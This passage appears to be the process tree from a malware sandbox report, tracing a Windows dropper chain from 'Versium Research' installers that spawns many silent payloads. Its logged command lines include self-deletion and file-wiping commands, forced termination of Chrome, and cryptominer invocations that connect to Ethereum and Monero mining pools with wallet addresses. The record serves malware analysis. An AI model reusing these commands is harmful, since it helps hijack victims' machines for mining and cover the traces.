    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
    3⤵
    PID:5380
  - - C:\Users\Admin\AppData\Local\Temp\is-LDPC6.tmp\LabPicV3.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-LDPC6.tmp\LabPicV3.tmp" /SL5="$20386,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
      4⤵
      PID:492
    - - C:\Users\Admin\AppData\Local\Temp\is-3SOG7.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3SOG7.tmp\ppppppfy.exe" /S /UID=lab214
        5⤵
        
        PID:5864
      - C:\Program Files\Windows Portable Devices\BNWLAZMZYY\prolab.exe
        
        "C:\Program Files\Windows Portable Devices\BNWLAZMZYY\prolab.exe" /VERYSILENT
        6⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\is-8TPCL.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8TPCL.tmp\prolab.tmp" /SL5="$6035A,575243,216576,C:\Program Files\Windows Portable Devices\BNWLAZMZYY\prolab.exe" /VERYSILENT
        7⤵
        
        PID:4732
      - C:\Users\Admin\AppData\Local\Temp\74-6d04d-432-2cc81-c51dc15f052dc\Gaeshaetukypae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\74-6d04d-432-2cc81-c51dc15f052dc\Gaeshaetukypae.exe"
        6⤵
        
        PID:1416
      - C:\Users\Admin\AppData\Local\Temp\71-269ec-e8f-084a9-0499c56d35f09\Hirenajaeru.exe
        
        "C:\Users\Admin\AppData\Local\Temp\71-269ec-e8f-084a9-0499c56d35f09\Hirenajaeru.exe"
        6⤵
        
        PID:5312
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ooat0vpi.bvr\md6_6ydj.exe & exit
        7⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\ooat0vpi.bvr\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\ooat0vpi.bvr\md6_6ydj.exe
        8⤵
        
        PID:5096
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eaeokmvj.1f3\Vidboxtest.exe & exit
        7⤵
        
        PID:6336
        
        C:\Users\Admin\AppData\Local\Temp\eaeokmvj.1f3\Vidboxtest.exe
        
        C:\Users\Admin\AppData\Local\Temp\eaeokmvj.1f3\Vidboxtest.exe
        8⤵
        
        PID:1232
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Vidboxtest.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\eaeokmvj.1f3\Vidboxtest.exe" & del C:\ProgramData\*.dll & exit
        9⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Vidboxtest.exe /f
        10⤵
        Kills process with taskkill
        
        PID:7204
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        10⤵
        Delays execution with timeout.exe
        
        PID:5972
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\40ont2ry.icx\askinstall31.exe & exit
        7⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\40ont2ry.icx\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\40ont2ry.icx\askinstall31.exe
        8⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:7944
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:7540
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eu5rkxvf.oh2\toolspab1.exe & exit
        7⤵
        
        PID:7044
        
        C:\Users\Admin\AppData\Local\Temp\eu5rkxvf.oh2\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\eu5rkxvf.oh2\toolspab1.exe
        8⤵
        
        PID:6928
        
        C:\Users\Admin\AppData\Local\Temp\eu5rkxvf.oh2\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\eu5rkxvf.oh2\toolspab1.exe
        9⤵
        
        PID:7404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zdwrick4.x1j\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:6852
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zl4ys2s4.kzx\setup_10.2_mix.exe & exit
        7⤵
        
        PID:7908
        
        C:\Users\Admin\AppData\Local\Temp\zl4ys2s4.kzx\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\zl4ys2s4.kzx\setup_10.2_mix.exe
        8⤵
        
        PID:5640
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cfu1vqv1.dq2\file.exe & exit
        7⤵
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\cfu1vqv1.dq2\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\cfu1vqv1.dq2\file.exe
        8⤵
        
        PID:6824
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        9⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Local\Temp\K4Z9F5AZNU\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\K4Z9F5AZNU\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:7976
        
        C:\Users\Admin\AppData\Local\Temp\K4Z9F5AZNU\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\K4Z9F5AZNU\multitimer.exe" 1 3.1617448108.60684cac82762 101
        11⤵
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\K4Z9F5AZNU\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\K4Z9F5AZNU\multitimer.exe" 2 3.1617448108.60684cac82762
        12⤵
        
        PID:8068
        
        C:\Users\Admin\AppData\Local\Temp\vkninxqebuz\noqv14pyhb1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vkninxqebuz\noqv14pyhb1.exe" /ustwo INSTALL
        13⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "noqv14pyhb1.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\vkninxqebuz\noqv14pyhb1.exe" & exit
        14⤵
        
        PID:6372
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "noqv14pyhb1.exe" /f
        15⤵
        Kills process with taskkill
        
        PID:7080
        
        C:\Users\Admin\AppData\Local\Temp\te2bkc25tzf\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\te2bkc25tzf\app.exe" /8-23
        13⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\igcgzplidzu\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\igcgzplidzu\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\is-SP8M6.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SP8M6.tmp\Setup3310.tmp" /SL5="$13014C,138429,56832,C:\Users\Admin\AppData\Local\Temp\igcgzplidzu\Setup3310.exe" /Verysilent /subid=577
        14⤵
        
        PID:6448
        
        C:\Users\Admin\AppData\Local\Temp\is-62TH0.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-62TH0.tmp\Setup.exe" /Verysilent
        15⤵
        
        PID:9008
        
        C:\Users\Admin\AppData\Local\Temp\nji4dedrpzl\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nji4dedrpzl\cpyrix.exe" /VERYSILENT
        13⤵
        
        PID:7652
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        14⤵
        
        PID:6832
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        15⤵
        
        PID:8300
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        15⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        16⤵
        
        PID:8972
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        14⤵
        
        PID:8196
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        15⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\k5o0iawxxpt\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\k5o0iawxxpt\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:8156
        
        C:\Users\Admin\AppData\Local\Temp\is-36TBG.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-36TBG.tmp\vict.tmp" /SL5="$20604,870426,780800,C:\Users\Admin\AppData\Local\Temp\k5o0iawxxpt\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Local\Temp\is-3D5PR.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3D5PR.tmp\win1host.exe" 535
        15⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\4ZKRGV4ZUB\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4ZKRGV4ZUB\setups.exe" ll
        10⤵
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\is-SQ4FG.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-SQ4FG.tmp\setups.tmp" /SL5="$60328,635399,250368,C:\Users\Admin\AppData\Local\Temp\4ZKRGV4ZUB\setups.exe" ll
        11⤵
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        9⤵
        
        PID:7748
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        10⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        11⤵
        Kills process with taskkill
        
        PID:7968
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        9⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        10⤵
        
        PID:7880
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        11⤵
        
        PID:7260
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        9⤵
        
        PID:8168
        
        C:\Users\Admin\AppData\Roaming\7B9F.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\7B9F.tmp.exe"
        10⤵
        
        PID:1868
        
        C:\Users\Admin\AppData\Roaming\7B9F.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\7B9F.tmp.exe"
        11⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Roaming\87C7.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\87C7.tmp.exe"
        10⤵
        
        PID:6468
        
        C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\87C7.tmp.exe
        11⤵
        
        PID:7548
        
        C:\Users\Admin\AppData\Roaming\8758.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\8758.tmp.exe"
        10⤵
        
        PID:4536
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        11⤵
        
        PID:6892
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        11⤵
        
        PID:7672
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        10⤵
        
        PID:7856
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        11⤵
        Runs ping.exe
        
        PID:7552
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        9⤵
        
        PID:5588
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tqwzndf4.2yi\f7c5e026.exe & exit
        7⤵
        
        PID:7764
        
        C:\Users\Admin\AppData\Local\Temp\tqwzndf4.2yi\f7c5e026.exe
        
        C:\Users\Admin\AppData\Local\Temp\tqwzndf4.2yi\f7c5e026.exe
        8⤵
        
        PID:8004
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ziuc21c2.0sp\app.exe /8-2222 & exit
        7⤵
        
        PID:6028
        
        C:\Users\Admin\AppData\Local\Temp\ziuc21c2.0sp\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\ziuc21c2.0sp\app.exe /8-2222
        8⤵
        
        PID:6552
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t2qop1os.hgn\Four.exe & exit
        7⤵
        
        PID:7724
        
        C:\Users\Admin\AppData\Local\Temp\t2qop1os.hgn\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\t2qop1os.hgn\Four.exe
        8⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Local\Temp\ZKQZ428AD0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZKQZ428AD0\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        9⤵
        
        PID:8816
        
        C:\Users\Admin\AppData\Local\Temp\ZKQZ428AD0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZKQZ428AD0\multitimer.exe" 1 3.1617448169.60684ce94d7b9 104
        10⤵
        
        PID:8784
        
        C:\Users\Admin\AppData\Local\Temp\ZKQZ428AD0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ZKQZ428AD0\multitimer.exe" 2 3.1617448169.60684ce94d7b9
        11⤵
        
        PID:6584
        
        C:\Users\Admin\AppData\Local\Temp\5lmzpkfjymg\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5lmzpkfjymg\vict.exe" /VERYSILENT /id=535
        12⤵
        
        PID:7388
        
        C:\Users\Admin\AppData\Local\Temp\is-5FO7E.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5FO7E.tmp\vict.tmp" /SL5="$50700,870426,780800,C:\Users\Admin\AppData\Local\Temp\5lmzpkfjymg\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:7972
        
        C:\Users\Admin\AppData\Local\Temp\is-PVQ8B.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-PVQ8B.tmp\win1host.exe" 535
        14⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Local\Temp\wkp0rj41f45\ul22j3mj5zm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wkp0rj41f45\ul22j3mj5zm.exe" /ustwo INSTALL
        12⤵
        
        PID:8888
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "ul22j3mj5zm.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\wkp0rj41f45\ul22j3mj5zm.exe" & exit
        13⤵
        
        PID:6716
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "ul22j3mj5zm.exe" /f
        14⤵
        Kills process with taskkill
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\fd0juzpnqze\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fd0juzpnqze\Setup3310.exe" /Verysilent /subid=577
        12⤵
        
        PID:8076
        
        C:\Users\Admin\AppData\Local\Temp\is-DFH69.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DFH69.tmp\Setup3310.tmp" /SL5="$6051A,138429,56832,C:\Users\Admin\AppData\Local\Temp\fd0juzpnqze\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:8784
        
        C:\Users\Admin\AppData\Local\Temp\is-MBELC.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-MBELC.tmp\Setup.exe" /Verysilent
        14⤵
        
        PID:8868
        
        C:\Users\Admin\AppData\Local\Temp\frdsq5emnvh\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\frdsq5emnvh\app.exe" /8-23
        12⤵
        
        PID:6872
        
        C:\Users\Admin\AppData\Local\Temp\eg0s3bx3rgb\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\eg0s3bx3rgb\cpyrix.exe" /VERYSILENT
        12⤵
        
        PID:8852
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        13⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        14⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        14⤵
        
        PID:8508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        15⤵
        
        PID:4524
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        13⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        14⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\5FEZXXLTLP\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5FEZXXLTLP\setups.exe" ll
        9⤵
        
        PID:9144
        
        C:\Users\Admin\AppData\Local\Temp\is-3ICBE.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3ICBE.tmp\setups.tmp" /SL5="$4064A,635399,250368,C:\Users\Admin\AppData\Local\Temp\5FEZXXLTLP\setups.exe" ll
        10⤵
        
        PID:5428
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
    3⤵
    PID:5404
  - - C:\Users\Admin\AppData\Local\Temp\is-TTHUC.tmp\lylal220.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-TTHUC.tmp\lylal220.tmp" /SL5="$30388,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
      4⤵
      PID:4432
    - - C:\Users\Admin\AppData\Local\Temp\is-N5S50.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-N5S50.tmp\Microsoft.exe" /S /UID=lylal220
        5⤵
        
        PID:6024
      - C:\Program Files\Uninstall Information\YYGLLHYEDR\irecord.exe
        
        "C:\Program Files\Uninstall Information\YYGLLHYEDR\irecord.exe" /VERYSILENT
        6⤵
        
        PID:4808
        
        C:\Users\Admin\AppData\Local\Temp\is-UND28.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UND28.tmp\irecord.tmp" /SL5="$6036A,6265333,408064,C:\Program Files\Uninstall Information\YYGLLHYEDR\irecord.exe" /VERYSILENT
        7⤵
        
        PID:2016
      - C:\Users\Admin\AppData\Local\Temp\81-8130d-b82-498ad-c3dde7b727738\Vigudomoqae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\81-8130d-b82-498ad-c3dde7b727738\Vigudomoqae.exe"
        6⤵
        
        PID:5932
      - C:\Users\Admin\AppData\Local\Temp\71-1ee0b-c43-58cba-663758843670e\Julusafiwu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\71-1ee0b-c43-58cba-663758843670e\Julusafiwu.exe"
        6⤵
        
        PID:2372
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\netko4in.som\md6_6ydj.exe & exit
        7⤵
        
        PID:6200
        
        C:\Users\Admin\AppData\Local\Temp\netko4in.som\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\netko4in.som\md6_6ydj.exe
        8⤵
        
        PID:6412
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5uojacue.y4l\Vidboxtest.exe & exit
        7⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\5uojacue.y4l\Vidboxtest.exe
        
        C:\Users\Admin\AppData\Local\Temp\5uojacue.y4l\Vidboxtest.exe
        8⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Vidboxtest.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5uojacue.y4l\Vidboxtest.exe" & del C:\ProgramData\*.dll & exit
        9⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Vidboxtest.exe /f
        10⤵
        Kills process with taskkill
        
        PID:7376
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        10⤵
        Delays execution with timeout.exe
        
        PID:648
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rapem3mi.tet\askinstall31.exe & exit
        7⤵
        
        PID:7036
        
        C:\Users\Admin\AppData\Local\Temp\rapem3mi.tet\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\rapem3mi.tet\askinstall31.exe
        8⤵
        
        PID:6384
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pv5nqhf1.1zm\toolspab1.exe & exit
        7⤵
        
        PID:6492
        
        C:\Users\Admin\AppData\Local\Temp\pv5nqhf1.1zm\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\pv5nqhf1.1zm\toolspab1.exe
        8⤵
        
        PID:7284
        
        C:\Users\Admin\AppData\Local\Temp\pv5nqhf1.1zm\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\pv5nqhf1.1zm\toolspab1.exe
        9⤵
        
        PID:7544
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5d4hkdhd.3br\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:7092
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4sff14pi.p4g\setup_10.2_mix.exe & exit
        7⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\4sff14pi.p4g\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\4sff14pi.p4g\setup_10.2_mix.exe
        8⤵
        
        PID:7756
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3dcnkeum.0yu\file.exe & exit
        7⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\3dcnkeum.0yu\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\3dcnkeum.0yu\file.exe
        8⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"
        9⤵
        
        PID:8368
        
        C:\Users\Admin\AppData\Local\Temp\3YOUZU70OX\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3YOUZU70OX\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:8624
        
        C:\Users\Admin\AppData\Local\Temp\3YOUZU70OX\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3YOUZU70OX\multitimer.exe" 1 3.1617448177.60684cf1bd3c1 101
        11⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\3YOUZU70OX\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3YOUZU70OX\multitimer.exe" 2 3.1617448177.60684cf1bd3c1
        12⤵
        
        PID:8808
        
        C:\Users\Admin\AppData\Local\Temp\oztctkiqrd5\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oztctkiqrd5\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:3504
        
        C:\Users\Admin\AppData\Local\Temp\is-0TGKC.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0TGKC.tmp\Setup3310.tmp" /SL5="$305CA,138429,56832,C:\Users\Admin\AppData\Local\Temp\oztctkiqrd5\Setup3310.exe" /Verysilent /subid=577
        14⤵
        
        PID:612
        
        C:\Users\Admin\AppData\Local\Temp\is-HJPEE.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HJPEE.tmp\Setup.exe" /Verysilent
        15⤵
        
        PID:9056
        
        C:\Users\Admin\AppData\Local\Temp\3w44th1jzjb\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3w44th1jzjb\app.exe" /8-23
        13⤵
        
        PID:9104
        
        C:\Users\Admin\AppData\Local\Temp\veabms30fq1\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\veabms30fq1\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\is-FR8SQ.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FR8SQ.tmp\vict.tmp" /SL5="$40462,870426,780800,C:\Users\Admin\AppData\Local\Temp\veabms30fq1\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\is-LUKMB.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-LUKMB.tmp\win1host.exe" 535
        15⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\0cfz0ljc5qd\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0cfz0ljc5qd\cpyrix.exe" /VERYSILENT
        13⤵
        
        PID:5992
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        14⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        15⤵
        
        PID:3976
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        15⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        16⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        14⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\sv2pjfdtbh0\ubrjfdwszys.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sv2pjfdtbh0\ubrjfdwszys.exe" /ustwo INSTALL
        13⤵
        
        PID:8804
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "ubrjfdwszys.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\sv2pjfdtbh0\ubrjfdwszys.exe" & exit
        14⤵
        
        PID:7232
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "ubrjfdwszys.exe" /f
        15⤵
        Kills process with taskkill
        
        PID:9200
        
        C:\Users\Admin\AppData\Local\Temp\EZY9V8NJN5\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EZY9V8NJN5\setups.exe" ll
        10⤵
        
        PID:8864
        
        C:\Users\Admin\AppData\Local\Temp\is-HON0B.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HON0B.tmp\setups.tmp" /SL5="$406A2,635399,250368,C:\Users\Admin\AppData\Local\Temp\EZY9V8NJN5\setups.exe" ll
        11⤵
        
        PID:8620
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
        9⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        10⤵
        
